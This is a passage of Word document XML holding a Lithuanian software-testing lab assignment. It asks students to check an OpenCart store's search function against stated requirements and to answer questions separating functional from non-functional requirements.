        <w:t xml:space="preserve"> naudoti funkcinius reikalavimus </w:t>
      </w:r>
      <w:r w:rsidR="003167E6" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>testuojant programinę įrangą</w:t>
      </w:r>
      <w:r w:rsidR="00FB54DC" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. Išmokti nustatyti neatitikimus tarp reikalavimuose apibrėžtų ir realizuotų sistemos funkcijų.</w:t>
      </w:r>
      <w:r w:rsidR="004112F7" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0067393A" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Eiga</w:t>
      </w:r>
      <w:r w:rsidR="00A50D5E" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B12E4D" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">OpenCart sistemoje (teirautis nuorodos </w:t>
      </w:r>
      <w:r w:rsidR="007A2A80" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">iš </w:t>
      </w:r>
      <w:r w:rsidR="00B12E4D" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">dėstytojo), </w:t>
      </w:r>
      <w:r w:rsidR="00CF0E78" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">atidarykite paieškos langą paspausdami ant paieškos mygtuko. Įvesdami įvairius paieškos kriterijus, įsitikinkite, kad Sistema veikia taip, kaip nurodo žemiau pateikti reikalavimai. </w:t>
      </w:r>
      <w:r w:rsidR="00C44ECF" w:rsidRPr="00AD4464">
        <w:t>Pateikite skirtum</w:t>
      </w:r>
      <w:r w:rsidR="00882938" w:rsidRPr="00AD4464">
        <w:t>ų sąrašą</w:t>
      </w:r>
      <w:r w:rsidR="00C44ECF" w:rsidRPr="00AD4464">
        <w:t>, jei tokių pastebėsite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00CC127B" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Opencart – Paieška (supaprastinti paieškos funkcionalumo reikalavimai)</w:t>
      </w:r>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00CC127B" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>- Jei į paieškos lauką įvedamas produkto tikslus pavadin</w:t>
      </w:r>
      <w:r w:rsidR="00733F29" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>imas ir spaudžiamas</w:t>
      </w:r>
      <w:r w:rsidR="004112F7" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Paieška" my</w:t>
      </w:r>
      <w:r w:rsidR="00733F29" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>gtukas</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>, sistema pateikia sąrašą v</w:t>
      </w:r>
      <w:r w:rsidR="00733F29" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>isų šio produkto atmainų, turimų</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> pardavime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00CC127B" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>- jei įvedamas raktažodis pagal produkto katego</w:t>
      </w:r>
      <w:r w:rsidR="00733F29" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>riją ir spaudžiamas "Paieška" mygtukas</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>, sistema pateikia</w:t>
      </w:r>
      <w:r w:rsidR="00733F29" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> atitinkamos kategorijos</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> produktų</w:t>
      </w:r>
      <w:r w:rsidR="00733F29" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> sarašą </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00CC127B" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">- Jei į paieškos laukelį </w:t>
      </w:r>
      <w:r w:rsidR="007A2A80" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">nieko </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>neįvedame ir spaud</w:t>
      </w:r>
      <w:r w:rsidR="00733F29" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>žiame "Paieška" mygtuką, sistema grąžina visų</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> turimų prekių sąrašą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00CC127B" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>- Jei į paieškos laukelį įvedame neegzistuojačio produkto pavad</w:t>
      </w:r>
      <w:r w:rsidR="00733F29" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>inimą ir spaudžiame "Paieška" my</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>gtuką, sistema pateikia pranešimą, apie tokio produkto nebuvimą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00CC127B" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>- Jei paieškos rezultatų yra</w:t>
      </w:r>
      <w:r w:rsidR="00733F29" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> daug, jie yra skirstom</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>i į puslapius po 10 rezultatų kiekviename puslapyje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00CC127B" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>- Paieškos rezultatai yra surūšiuoti abėcėlės tvarka.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00DB66F6" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NEFUNKCINIAI (TECHNINIAI, SAUG</w:t>
      </w:r>
      <w:r w:rsidR="00842318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>UMO</w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>) REIKALAVIMAI</w:t>
      </w:r>
      <w:r w:rsidR="004D5173">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00DB66F6" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Atsakykite į žemiau pateiktus klausimus. Kiekvie</w:t>
      </w:r>
      <w:r w:rsidR="00B11BF8" w:rsidRPr="00AD4464">
        <w:t>nas klausimas gali turėti vieną arba daugiau teisingų atsakymų</w:t>
      </w:r>
      <w:r w:rsidR="004D5173">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B11BF8" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="0099296E" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00013272" w:rsidRPr="00AD4464">
        <w:t>Geb</w:t>
      </w:r>
      <w:r w:rsidR="00013272" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ėti skirti funkcinius sistemos r</w:t>
      </w:r>
      <w:r w:rsidR="005D1B5F" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>eikalavimus nuo nefu</w:t>
      </w:r>
      <w:r w:rsidR="00013272" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="005D1B5F" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00013272" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>cinių. Suprasti ir gebėti paaiškinti nefunkcinių reikalavimų rūšis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002345A7" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kokie yra pagrindiniai skirtumai tarp funkcini</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ų ir nefunkcinių sistemos reikalavimų</w:t>
      </w:r>
      <w:r w:rsidR="00D455E8" w:rsidRPr="00AD4464">
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15A0" w:rsidRPr="00AD4464" w:rsidRDefault="00AE15A0" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>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D242F" w:rsidRPr="00AD4464" w:rsidTr="00CD3665">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000D242F"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0D242F" w:rsidRPr="00AD4464" w:rsidRDefault="000D242F" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000D242F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Pateikite bent penkis nefunkcinių reikalavimų testavimo tipus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007714A5" w:rsidRPr="00AD4464" w:rsidRDefault="007714A5" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>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D242F" w:rsidRPr="00AD4464" w:rsidTr="00CD3665">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000D242F"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0D242F" w:rsidRPr="00AD4464" w:rsidRDefault="000D242F" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000D242F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kodėl svarbu žiniatinklio programas testuoti su skirtingomis naršyklėmis?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00674137" w:rsidRPr="00AD4464" w:rsidRDefault="00674137" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>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D242F" w:rsidRPr="00AD4464" w:rsidTr="00CD3665">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000D242F"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0D242F" w:rsidRPr="00AD4464" w:rsidRDefault="000D242F" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000D242F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Pateikit</w:t>
      </w:r>
      <w:r w:rsidR="000B6F6B" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">e bent tris pavyzdžius </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>kaip naršyklių teikiamas “developer tools” įrankių rinkinys gali būti taikomas žiniatinklio program</w:t>
      </w:r>
      <w:r w:rsidR="00633DCF" w:rsidRPr="00AD4464">
        <w:t>os</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> testavimui.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A47D35" w:rsidRPr="00AD4464" w:rsidRDefault="00A47D35" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>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D242F" w:rsidRPr="00AD4464" w:rsidTr="00CD3665">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000D242F"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0D242F" w:rsidRPr="00AD4464" w:rsidRDefault="000D242F" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000D242F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Žemiau pateiktus reikalavimus sugrupuokite į atitinkamas reikalavimų grupes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000D242F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00BB0174" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">istema turi gebėti aptarnauti </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">vidutiniškai </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>500 vartotojų vienu metu;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000D242F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Turi būti galimybė vartotojui pačiam susikurti/redaguoti/šalinti savo paskyrą;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BB0174" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Vartotojas gali įkelti</w:t>
      </w:r>
      <w:r w:rsidR="000D242F" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> paskyros nuotrauką, kuri neviršija 3MB;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00DE4F88" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Esant poreikiui, sistema turi pateikti vartotojui ataskaitą apie jo aktyvumą;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00DE4F88" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Vartoto</w:t>
      </w:r>
      <w:r w:rsidR="00BB0174" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">jo duomenų pakeitimų saugojimas turi užtrukti </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00BB0174" w:rsidRPr="00AD4464">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> ilgiau nei 0,</w:t>
      </w:r>
      <w:r w:rsidR="00257321" w:rsidRPr="00AD4464">
        <w:t>15 sekundės;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00257321" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sistema turi palaikyti vartotojo identifikavimą mobiliuoju parašu;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BB0174" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sistema turi būti pritaikyt</w:t>
      </w:r>
      <w:r w:rsidR="00257321" w:rsidRPr="00AD4464">
        <w:t>a neįgaliems;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00257321" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Vartotojas gali parsisiųti ataskaitą apie savo aktyvumą .csv formatu;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00257321" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sistema turi palaikyti dvi kalbas (LT, EN);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="007B225C" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Sistemos sutrikimo atveju, turi būti galimybė atstatyti </w:t>
      </w:r>
      <w:r w:rsidR="009909F2" w:rsidRPr="00AD4464">
        <w:t>prarastus duomenis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D242F" w:rsidRPr="00AD4464" w:rsidRDefault="000D242F" w:rsidP="00372B3A">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0D242F" w:rsidRPr="00AD4464" w:rsidTr="00CD3665">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000D242F" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Funkciniai reikalavimai:</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0D242F" w:rsidRPr="00AD4464" w:rsidRDefault="000D242F" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="000D242F" w:rsidRPr="00AD4464" w:rsidRDefault="000D242F" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Nefunkciniai</w:t>
            </w:r>
            <w:r w:rsidR="00F76863" w:rsidRPr="00AD4464">
              <w:t xml:space="preserve"> reikalavimai</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00490670" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Ar reikalavimų peržiūr</w:t>
      </w:r>
      <w:r w:rsidR="00795637" w:rsidRPr="00AD4464">
        <w:t>ą</w:t>
